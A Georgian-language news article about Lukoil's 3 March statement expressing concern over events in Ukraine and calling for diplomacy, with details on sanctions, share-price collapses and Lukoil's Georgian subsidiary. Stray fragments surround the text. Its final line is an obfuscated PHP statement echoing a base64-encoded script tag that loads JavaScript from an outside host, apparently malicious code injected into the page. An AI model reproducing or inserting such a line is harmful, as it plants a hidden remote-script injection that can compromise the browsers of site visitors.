celsiusi
ავერსი საქკაბელი
მსხვილი რუსული ენერგოკომპანია „ლუკოილი“ უკრაინაში „ტრაგიკული მოვლენების“ გამო შეშფოთებას გამოხატავს და „დიპლომატიურ გამოსავალზე“ საუბრობს.
 
Financial Times-ის ცნობით, „ლუკოილი“, რომელიც ქვეყნის მეორე ყველაზე მსხვილი ნავთობკომპანიაა, არის პირველი რუსული კომპანია, რომელიც უკრაინაში ომს აკრიტიკებს, – თუმცა განცხადებაში სიტყვა „ომს“ არ ახსენებს.
 
„კომპანიის დირექტორთა საბჭო გამოხატავს შეშფოთებას უკრაინაში მიმდინარე ტრაგიკული მოვლენების გამო და თანაუგრძნობს ყველას, ვინც ამ ტრაგედიით ზარალდება“, – წერს კომპანია 3 მარტს გამოქვეყნებულ განცხადებაში.
 
„ლუკოილი“ ასევე აცხადებს:
 
„ჩვენ გამოვდივართ შეიარაღებული კონფლიქტის სწრაფი დასრულების მოთხოვნით და სრულად ვუჭერთ მხარს მის გადაწყვეტილას მოლაპარაკებების პროცესით, დიპლომატიური გზით“, – წერია განცხადებაში.
 
რუსეთისთვის სანციების დაწესებიდან სულ რამდენიმე დღეში, 3 მარტისთვის, ლუკოილის აქციების ფასი ლონდონის საფონდო ბირჟაზე, – სადაც მას ვაჭრობა აეკრძალა, – 99.2%-ით შემცირდა.
 
მსგავსი გამოწვევის წინაშე დგანან სხვა რუსული კომპანიები: „სბერბანკი“ (-99.72%), „გაზპრომი“ (-93.71%) და სხვები.
 
„ლუკოილი“ ფუნქციონირებს საქართველოშიც. შპს „ლუკოილ-ჯორჯია“ 2002 წელს დარეგისტრირდა. კომპანიის 100%-ის მფლობელი შვეიცარიაში რეგისტრირებული სს „ლიტასკოა“. „ლიტასკოს“ საბოლოო ბენეფიციარი კი სწორედ რუსული „ლუკოილია“.
 
„ლუკოილი“ უკრაინაში 2017 წლამდე ოპერირებდა. მას აქამდეც შეხებია სანქციები – კერძოდ, 2014 წელს რუსეთის მიერ ყირიმის ანექსიის გამო დაწესებული სანქციები.
842
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");